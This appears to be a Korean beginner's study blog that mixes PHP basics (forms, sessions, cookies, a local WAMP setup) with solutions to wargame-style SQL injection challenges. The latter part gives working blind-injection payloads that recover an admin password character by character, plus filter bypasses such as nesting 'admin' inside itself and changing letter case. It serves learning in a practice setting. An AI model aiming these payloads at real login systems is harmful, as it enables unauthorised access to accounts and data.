YesYes

<meta charset="UTF-8">

-> UTF-8은 무조건 대문자로 써야한다.

form action="login_process.php method="POST"

-> login_process.php 로 넘어간다. POST형태로.

-> 이 다음 php에서 name=" " 이 안에 있는 것들이 변수로 간다.

$id랑 $pwd는 정의한것이고

$_POST는 넘어온것이다.

둘이 같으면

$_SESSION['is_login'] = true;

-> 세션 is_login을 참으로 한다.

$_SESSION['nickname'] = 'Jnamelight';

-> 세션 nickname을 Jnamelight로 정의한다.

그리고 

header('Location ./session.php');

-> session.php로 넘어가는 코드이다.

isset 은 설정되어 있는지 확인하는 함수다.

세션 is_login이 0이라면 loginform.html로 가고

세션 is_login이 1이라면 아래 html 을 표시한다.

그리고 로그아웃을 누르면 logout.php로 간다.

바로 ./loginform.html로 넘어간다.

이 창은 우리가 정확히 볼 순 없다.

쿠키

쿠키는 웹사이트 접속시 접속자의 개인장치에 다운로드 되고 브라우저에 저장되는 작은 텍스트파일이다.
웹사이트는 쿠키를 통해 접속자의 장치를 인식하고, 접속자의 설정과 과거 이용내용에 대한 일부를 저장.
다음에 더욱 손쉽게 방문할수 있도록 해줌.

test4.php 한다음 test5.php 하니까 됐다. ㅇㅎㅋㅎㅋ

쿠키 맨날 봐도 뭔소린지 모르겠었는데

서버쪽에서 setcookie한것을 $_COOKIE[''] 이런식으로 받는거였구나.

세션

사용자가 실행하는 일련의 통신을 세션이라고함.
쿠키와 달리 보안상 로그인 정보를 서버에 저장하여 사용자들의 로그인 정보에 대한 보안을 한층 높게 해준다고 함.
쿠키는 브라우저에 정보를 저장, 세션은 서버에 저장하므로 세션이 보안이 더 높다고함.

서버에서

session_start(); 를하고

$_SESSION['세션이름'] = '내용';

형식으로 세션을 만들고

클라이언트쪽에서

session_start();

echo $_SESSION['세션이름']

하면 된다.

session_destroy();

는 아이디는 없어지지않고 세션 내용만 없어진다.

sql injection할때 나오는 함수를 한번 사용해보았다.

test2.php인데 결과는

이렇게나온다.

또다른 예제는

습..ㅋㅋㅋ 먼가 C++같다 ㅋㅋㅋㅋㅋ

리턴형은 딱히 필요없는데

출력을할땐 echo $aa; 이런식이고

return 은 return $aa; 이렇게 하면 된다.

따로 호출하는건 echo bb(); 이런식밖에 없는 것 같다.

웹이 하고싶어서

웹서버를 php쪽으로 한번 구현해보기로했다.

1. Bitnami란 사이트에서 WAMP를 다운받았다.

2. 그리고 다 받은다음 

<?php

    phpinfo()

?>

이렇게 입력하고 

E:\bitnami\apache2\htdocs

이 위치에 파일을 넣고

http://localhost/파일이름 

이런식으로 넣어주니 php파일이 열렸다!!

그리고 html에서 한글로 만들어주는것에서 좀 해맸는데

헤드부분에

<head>

<meta charset="utf-8"> 만 해줘도 된다.

</head>

php에서 세미콜론이 아주 중요하다.

php에서 $_POST['money'] 이런식으로 POST나 GET은 무조건 대문자를 써야한다.

호옹이 이제 완벽하게 완성!!!

소스코드

test1.html

result.php

코드는 이렇고

실행창은 대충 이렇다

800입력하면 아래처럼 나온다.

후우... 처음하는 php 성공!!!

?pw=1' || id like 'admin' && length(pw) like 8# -> 길이가 8이다!
?pw=1%27%20||%20id%20like%20%27admin%27%20%26%26%20length(pw)%20like%208%23

substr이 막혀서 이제 mid나 substring, right, left를 사용한다고한다.

?pw=%27%20||%20mid(pw,1,1)%20like%207%23
?pw=' || mid(pw,1,1) like 7#
mid(문자열,위치,길이)
select mid('abcde',2,2) -> bc

(substring도 같음)

?pw=77d6290b

?pw=1' or 1=1 and id='admin'#

?pw=1%27%20or%201=1%20and%20id=%27admin%27%23

( id=guest && pw=1 ) || (1=1 && id=admin)      # and 1=0

이니까 1=1이 언제나참이고 id가 admin일때가 있으니까 실행된다.

strtolower -> id로 받아온것을 다 소문자로 돌리는거겠지.

str_replace -> str_replace( 바꿀문자, 이렇게바꿀것이다. 하는 문자, 변수 )  

$value = "가나다라마바사";

echo str_replace("사", "가", $value); 

-> 이렇게 하면 " 가나다라마바가 " 가 된다고 한다.

그렇다면 위에것은

$_GET[id]의 admin을 공백으로 바꾼다는 것이다.

한마디로 이전에 했던 id=Admin이 먹히지않는다는 뜻이다.

그리고 admin이란 단어를 사용하지 못한다는 거시다...

그렇다면 어떻게 해야할까.. 이런;;;

?id=adadminmin 이렇게 입력하면 된다.

이유는 str_replace를 돌떄 ad (admin) min 이렇게 괄호안에 것만 필터링하고 앞뒤로 남은 ad과 min은 남게된다.

그래서 admin으로 합쳐지게된다.

이렇게인데

admin을 아예 못쓰게끔해놨다...

그래서 결국 해야하는건

php는 변수명을 제외하곤 대소문자 구분이 없다.

그래서 

?id=Admin을 입력하면 된다.

?pw=' || length(pw)='8

이렇게 치면 길이가 8인것을 알 수 있다.

?pw=1%27%20||%20id=%27admin%27%20%26%26%20substr(pw,1,1)=%277
?pw=1' || id='admin' && substr(pw,1,1)='7

이런식으로 치면 각 자리의 값을 찾아낼 수 있다.

select id from prob_orge where id ='guest' and pw='1' || id='admin' && substr(pw,1,1)='7'

이런식으로 하면 첫글자가 7이란걸 알 수 있다.

답 : ?pw=7b751aec

알게되었던건 ||는 그대로 들어가지만 && 은 %26%26인 URL형태로 넣어야한다는것.